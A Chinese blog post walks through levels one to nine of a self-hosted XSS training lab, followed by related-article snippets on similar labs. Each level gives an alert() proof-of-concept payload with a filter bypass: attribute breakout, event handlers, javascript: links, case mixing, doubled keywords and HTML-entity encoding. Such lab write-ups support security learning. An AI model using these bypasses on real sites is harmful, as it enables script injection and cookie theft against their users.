自建靶场 XSS练习(一)

最新推荐文章于 2024-08-18 10:57:52 发布
最新推荐文章于 2024-08-18 10:57:52 发布
阅读量972 收藏 8
点赞数 3
分类专栏: 网络安全 文章标签: 网络安全 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanxiaoyao1/article/details/114267375
版权

自建靶场 XSS练习(一)

点击链接快速跳到指定关卡

文章目录

靶场搭建

我用的是phpStudy,靶场代码可以去github上找,或者私信问我要
浏览器用的火狐,有hackbar插件,谁用谁知道

在这里插入图片描述

一、第一关

在这里插入图片描述
点击进入第一关
在这里插入图片描述
这关没啥难度,简单粗暴,后台也没有过滤。name=<script>alert(/xss/)</script>就过了,当然你想玩点更花哨的也没人拦着你。
在这里插入图片描述

二、第二关

<script>alert(/xss/)</script>试一下在这里插入图片描述
发现value属性没有加过滤,那就直接闭合标签,用这个"><script>alert(/xss/)</script>//,过在这里插入图片描述

三、第三关

还是老样子,<script>alert(/xss/)</script>试一下,发现<和>被转义了在这里插入图片描述
尝试构造event触发XSS,代码' onmousemove='javascript:alert(/xss/)在这里插入图片描述
鼠标在搜索框里移动一下,过在这里插入图片描述
当然也可用别的event,比如onclick

四、第四关

再用<script>alert(/xss/)</script>试一下在这里插入图片描述
等一下,我尖括号呢?

用和上一关一样的POC,"onmousemove="javascript:alert(/xss/),因为没尖括号,随便你过滤,注意把单引号换成双引号在这里插入图片描述

五、第五关

还是<script>alert(/xss/)</script>试一下在这里插入图片描述

发现scripton被过滤,尝试大小写,不行,但是尖括号没被过滤,灵鸡一动,构造新标签,利用href触发XSS,poc"> <a href='javascript:alert(/xss/)'>,点击过关在这里插入图片描述

六、第六关

发现href script on都被过滤在这里插入图片描述
尝试大小写,POC"><ScRiPt>alert(/xss/)</ScRIpT>,触发XSS,通过在这里插入图片描述

七、第七关

<script>alert(/xss/)</script>试一下,script被过滤,不见了在这里插入图片描述
复写,构造POC,"> <scrscriptipt>alert(/xss/)</scrscriptipt>//,过滤中间script外层组成代码触发XSS在这里插入图片描述

七、第八关

又双叒叕<script>alert(/xss/)</script>试一下,上面<和"被过滤,下面script被过滤在这里插入图片描述

尝试大小也不行,复写也不行,最后用hackbar里面的html编码在这里插入图片描述
POC:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#47;&#120;&#115;&#115;&#47;&#41;在这里插入图片描述

九、第九关

查看源码,需要合法链接才能构造XSS在这里插入图片描述
他要就给他随便写一个,POCjavascript:alert(/xss/)//http://www.baidu.com,发现被过滤,不行在这里插入图片描述
大小写不行,尝试编码,t编码&#116;,POC:javascrip&#116;:alert(/xss/)//http://www.baidu.com,点击链接触发XSS在这里插入图片描述

今天先写到这,过两天把剩下的关卡写完

晚安

Is范逍遥
关注
专栏目录
xss靶场练习
qq_46804551的博客
11-02 253
- Pass-1 127.0.0.1/xss/level1.php?name=<script>alert(1)</script> 通过 - Pass-2 直接插入不行,引号将其包裹起了 http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><-- - Pass-3 审查元素看看 看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都
xss lab 靶场练习(1~10)
m0_52438027的博客
08-05 268
在下面的语法中我们可以看到,他默认编码双引号,但需要ent_quotes这个函数才可以同时编码双引号和单引号,而源码中并没有这个函数,并且源码中是用单引号来闭合的,所以我们可以通过单引号来逃离限制。第十关没有输入的地方这是我们打开源码发现只有在input下才可以注入,但我们发现只有在t_sort下才可以注入其他的不行。这里我们可以看到我们输入的内容在href标签下并且不能逃离双引号的限制,所以我们只能通过JavaScript标签来绕过。我们可以通过闭合双引号的方式来使我们的语句逃离他的限制。...
XSS靶场练习
zlloveyouforever的博客
04-30 745
XSS-labs靶场练习前十关 很详细的哦
xss漏洞(五,xss-labs靶场搭建及简单讲解)
2302_80280669的博客
08-06 660
本文基于github上的xss-labs靶场以及PHP study进行操作。
xss靶场练习(二)之xss小游戏
angry_program的博客
02-13 2798
前言 话说自从网络安全修正法推出, 不敢轻易动国内的网站, 平时就打打靶场, 本文记录练习之路。 xss小游戏在线地址:http://test.ctf8.com/ xss小游戏一共二十关。 为了方便, 我把项目copy在本地。 为了方便实战效果和理解, 本文采用先通关再展示源码的排版方式。 Leve-1 有一个参数name: 再看看name在html源...
自建靶场WP(tp+SUID+容器逃逸)
DoNotShyDoIt的博客
07-19 1508
5.0.23*
网络安全xss靶场练习
bb_lo的博客
08-18 1137
靶场地址页面显示如下。
DVWA靶场XSS三种类型漏洞练习
c_programj的博客
05-14 1977
DVWA靶场XSS三种漏洞练习反射型XSS(非持久性)【low】【Medium】【High】【Impossible】存储型XSS(持久性)【Low】【Medium】【High】【Impossible】DOM型【Low】【Medium】【High】【Impossible】总结:XSS漏洞常见函数: 反射型XSS(非持久性) 反射型 【low】 后台码源: <?php header ("X-XSS-Protection: 0"); // Is there any input? if
一个用于练习XSS靶场.zip
01-16
首先,靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面...
XSS-labs靶场练习-持续更新中
最新发布
09-09
还在为XSS烦恼吗,在这里手把手教你打靶场
XSS靶场
weixin_53860392的博客
03-08 827
1.
你还没有自己的靶场吗?来,自己建一个吧
网络安全
01-26 1379
靶场篇1、在线靶场BugKu(简单,推荐新手入门,还有在线工具)https://ctf.bugku.com/index.html北京联合大学BUUCTF(新靶场,难度中上,搜集了很多大赛原题)https://buuoj.cn/CTFhub靶场(含历年赛题) https://www.ctfhub.com/#/indexCTFshow靶场(题较多) https://ctf.show/chall...
xss_labs 漏洞平台靶场练习 总结 wp
Alexhirchi的博客
08-11 2880
每日学习 每日持续更新ing~ 文章目录xss漏洞什么是xssXSS分类构造xss思路靶场练习level1level2level3level4level5level6level7level8level9level10 xss漏洞 什么是xss xss(Cross Site Script),跨站脚本攻击 网页内嵌入HTML,CSS,JS代码 此漏洞也是网站存在相当多的漏洞,仅次于SQL注入,攻击者可以使用XSS来绕过访问控制,如同源策略。利用XSS可以窃取账号,网页挂马,发动拒绝服务攻击,发送垃圾邮件等.
[ 靶场环境篇 ] XSS-labs 靶场环境搭建(特别详细)
热门推荐
qq_51577576的博客
12-10 1万+
想入门渗透行业呢光有理论基础是不够的,更重要的是实践经验。 接下来我会分享一些入门级靶场,从环境搭建一直到通关教程。 入门级靶场会分享:pikachu、DVWA、XSS-labs、sql-labs、upload-labs等内容。 上篇文章写到了 pikachu 靶场的搭建,本文写 XSS-lab 靶场环境的搭建。 目录 一、环境准备 1 搭建环境 2 下载链接 二、安装教程 1. 首先我们需要搭建好PHP study: 2. 下载 xss-labs 靶场源码 3.解压缩并放入如下..
自建靶场2022
weixin_45423582的博客
02-12 3976
自建靶场2022 靶场介绍 本靶场是一个简单的内网渗透靶场。需要首先拿到win2008服务器的权限,再渗透内网拿下WinXP,win2008上没有flag,flag在WinXP上。综合考验许多知识,暂未使用防护软件,属于一个比较基础的靶场。 主要配置如下: 系统 ip地址 kali 2020 192.168.1.106 win10 (本机) 192.168.1.104
xss-labs靶场的搭建和通关(1-18)
qq_53003652的博客
04-12 1310
这次的xsslabs通关耗费了挺多时间,由于本人才学疏浅,难免会有一些错误,希望大家能指正批评,如有疑问,可在下方留言,会第一时间进行回复!
Web安全:XSS || 文件上传 靶场搭建 (玩转整个 XSS || 文件上传 环境.)
网络安全领域___专研者.
04-24 972
XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.) 文件上传漏洞是指 Web 服务器允许用户将文件上传至其文件系统,但这些文件可能并没有经过充分的验证,如文件名称、类型、内容或大小等。未能正确执行这些限制就意味着即使最基本的图像上传功能也可能用于上传任意具有潜在危险的文件,里面甚至包括远程代码执行的服务器端脚
【超简单】小白也能搭建的pikachu靶场_github自己搭建靶场
m0_61331573的博客
04-09 885
1、点击链接,下载文件2、 将其放置在自己的环境目录的www下然后就可以访问进来了。
WEB安全渗透测试-pikachu&DVWA&sqli-labs&upload-labs&xss-labs靶场搭建(超详细)
m0_69583059的博客
01-23 2699
对于web安全刚入门的小伙伴来说,漏洞靶场搭建是很重要的,可以通过靶场学以致用,对所学知识点进行巩固练习。下面和我一起搭建5个比较常用的初学者入门靶场,演示搭建环境:win11系统+phpstudy。
反射型 xss靶场练习
09-27
在反射型XSS靶场练习中,可以使用以下步骤来进行练习: 1. 首先,找到一个含有反射型XSS漏洞的目标网站。 2. 在目标网站的输入框或URL参数中插入恶意代码,例如<script>alert("XSS")。 3. 提交输入或发送包含恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值